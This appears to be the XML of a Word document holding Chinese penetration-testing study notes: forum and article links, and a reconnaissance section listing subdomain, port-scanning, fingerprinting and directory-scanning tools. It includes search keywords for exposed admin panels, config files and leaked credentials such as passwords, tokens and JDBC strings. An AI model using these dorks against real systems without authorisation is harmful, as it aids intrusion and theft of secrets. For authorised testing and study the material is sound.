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6C" w:rsidRDefault="000764FB" w:rsidP="00FB531E">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://bbs.ichunqiu.com/thread-35887-1-1.html?from=beef" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FB531E" w:rsidRPr="009F2EF9">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/thread-35887-1-1.html?from=beef</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透测试 （寒假练手）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB531E" w:rsidRDefault="00972178" w:rsidP="00FB531E">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00FB531E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.ichunqiu.com/battalion?t=2&amp;r=54399</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FB531E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB531E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶场</w:t>
      </w:r>
      <w:r w:rsidR="009415C3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/web/213675.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/vuls/211847.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3"/>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/web/160883.html 用户密码重置凭证</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:r>
        <w:t>https://www.freebuf.com/articles/database/161495.html  重置凭证</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>接收端可篡改</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3"/>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3" w:rsidP="009415C3">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>freebuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>寻找文章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045396C" w:rsidRDefault="0045396C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009415C3" w:rsidRDefault="009415C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0045396C" w:rsidRDefault="0045396C" w:rsidP="00972178">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习看</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的文章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00972178" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00F76936" w:rsidRPr="00B01FDE">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/forum.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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知社区</w:t>
      </w:r>
    </w:p>
    <w:p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乌云</w:t>
      </w:r>
    </w:p>
    <w:p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FREEBUF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRPr="00CA7E51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墨</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>者文章</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>资料</w:t>
      </w:r>
    </w:p>
    <w:p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ool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8275F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText>https://www.t00ls.net/Penetration-articles.html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A9439B">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>https://www.t00ls.net/Penetration-articles.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>信息收集：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ois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r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长之家：</w:t>
      </w:r>
      <w:hyperlink r:id="rId10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hois.chinaz.com</w:t>
      </w:r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ugscaner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://whois.bugscaner.com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hois.bugscaner.com</w:t>
      </w:r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爱站网：</w:t>
      </w:r>
      <w:hyperlink r:id="rId11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12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.aizhan.com</w:t>
        </w:r>
      </w:hyperlink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在线：</w:t>
      </w:r>
      <w:hyperlink r:id="rId1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14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//bgp.he.net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总域名</w:t>
      </w:r>
    </w:p>
    <w:p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企查查：</w:t>
      </w:r>
      <w:hyperlink r:id="rId15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qichacha.com</w:t>
      </w:r>
    </w:p>
    <w:p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备案查询网：</w:t>
      </w:r>
      <w:hyperlink r:id="rId16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17" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.beianbeian.com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子域名</w:t>
      </w:r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neForAll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shmilylty/OneForAll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8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/shmilylty/OneForAll</w:t>
        </w:r>
      </w:hyperlink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bDomainsBrute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lijiejie/subDomainsBrute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9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/lijiejie/subDomainsBrute</w:t>
        </w:r>
      </w:hyperlink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list3r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aboul3la/Sublist3r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0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/aboul3la/Sublist3r</w:t>
        </w:r>
      </w:hyperlink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NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>二进制搜索：</w:t>
      </w:r>
      <w:hyperlink r:id="rId21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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>dns.bufferover.ru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 </w:t>
      </w:r>
      <w:hyperlink r:id="rId22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q </w:t>
      </w:r>
      <w:hyperlink r:id="rId23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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> .baidu.com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旁站</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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24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25" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//stool.chinaz.com/same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真实</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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检测：</w:t>
      </w:r>
      <w:hyperlink r:id="rId2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27" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.wepcc.com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</w:t>
      </w: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asm.ca.com/en/ping.php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8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//asm.ca.com/en/ping.php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检测：</w:t>
      </w:r>
      <w:r w:rsidR="00972178">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00972178">
        <w:instrText xml:space="preserve"> HYPERLINK "https://tools.ipip.net/dns.php" </w:instrText>
      </w:r>
      <w:r w:rsidR="00972178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972178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9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//tools.ipip.net/dns.php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Xcdn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3xp10it/xcdn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0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/3xp10it/xcdn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31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32" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//webiplookup.com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etcraft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toolbar.netcraft.com/site_report?url=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toolbar.netcraft.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>site_report</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId33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> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34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</w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00972178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hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>网址</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F76936">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F76936">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> : </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00F76936">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//crt.sh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入口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>+ C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>段</w:t>
      </w:r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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>谷歌插件</w:t>
      </w:r>
      <w:proofErr w:type="gram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hodan</w:t>
      </w:r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map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nmap.org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8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//nmap.org</w:t>
        </w:r>
      </w:hyperlink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asscan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robertdavidgraham/masscan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9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/robertdavidgraham/masscan</w:t>
        </w:r>
      </w:hyperlink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工具：御剑高速端口扫描工具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信息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googlehack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>语法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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后台地址</w:t>
      </w:r>
    </w:p>
    <w:p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管理后台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员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</w:p>
    <w:p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登录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guanli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登路</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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文件</w:t>
      </w:r>
    </w:p>
    <w:p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pdf / doc / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>xls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / txt</w:t>
      </w:r>
    </w:p>
    <w:p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log / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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测试环境</w:t>
      </w:r>
    </w:p>
    <w:p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测试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ceshi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p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intitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>：测试</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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邮箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>/ QQ /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
    </w:p>
    <w:p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邮件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电子邮件</w:t>
      </w:r>
    </w:p>
    <w:p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qq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群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企鹅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腾讯</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F7693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其他</w:t>
      </w:r>
    </w:p>
    <w:p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api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p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uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> = / id =</w:t>
      </w:r>
    </w:p>
    <w:p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标题：索引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lastRenderedPageBreak/>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p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密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秘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凭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令牌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通过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录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve">/ ftp / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p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curity_credentials</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>connetionstring</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t xml:space="preserve"> / JDBC / ssh2_auth_password / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>send_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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网盘引擎</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p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盘多多：</w:t>
      </w:r>
      <w:hyperlink r:id="rId40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41" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.panduoduo.net</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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凌风搜索：</w:t>
      </w:r>
      <w:hyperlink r:id="rId42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lingfengyun.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>（下载近似）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其他搜索</w:t>
      </w:r>
    </w:p>
    <w:p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莎</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>顿：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4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shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p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ZoomEye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www.zoomeye.org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ww.zoomeye.org</w:t>
      </w:r>
    </w:p>
    <w:p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FA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fofa.so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fofa.so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历史突破</w:t>
      </w:r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乌云名义：</w:t>
      </w:r>
      <w:hyperlink r:id="rId44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shuimugan.com</w:t>
      </w:r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eebug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www.seebug.org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ww.seebug.org</w:t>
      </w:r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漏洞利用数据库：</w:t>
      </w:r>
      <w:hyperlink r:id="rId45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46" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//www.exploit-db.com</w:t>
        </w:r>
      </w:hyperlink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Vulners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vulners.com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vulners.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76936" w:rsidRDefault="00F76936" w:rsidP="00F76936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信息深度搜集：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指纹识别</w:t>
      </w:r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插件：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Wappalyzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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云悉：</w:t>
      </w:r>
      <w:hyperlink r:id="rId47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ww.yunsee.cn</w:t>
      </w:r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eb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www.whatweb.net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ww.whatweb.net</w:t>
      </w:r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48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49" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//whatweb.bugscaner.com/look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目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p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御剑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
    </w:p>
    <w:p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7kbscan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7kbstorm/7kbscan-WebPathBrute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0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/7kbstorm/7kbscan-WebPathBrute</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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irsearch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maurosoria/dirsearch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1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/maurosoria/dirsearch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接口</w:t>
      </w:r>
    </w:p>
    <w:p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Finder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Threezh1/JSFinder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2" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/Threezh1/JSFinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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链接查找器：</w:t>
      </w:r>
      <w:hyperlink r:id="rId5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54" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>//github.com/GerbenJavado/LinkFinder</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p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搜索关键接口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 API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>”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ge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发布</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>”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pos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$ .ajax</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>识别</w:t>
      </w:r>
    </w:p>
    <w:p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w00f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EnableSecurity/wafw00f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5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
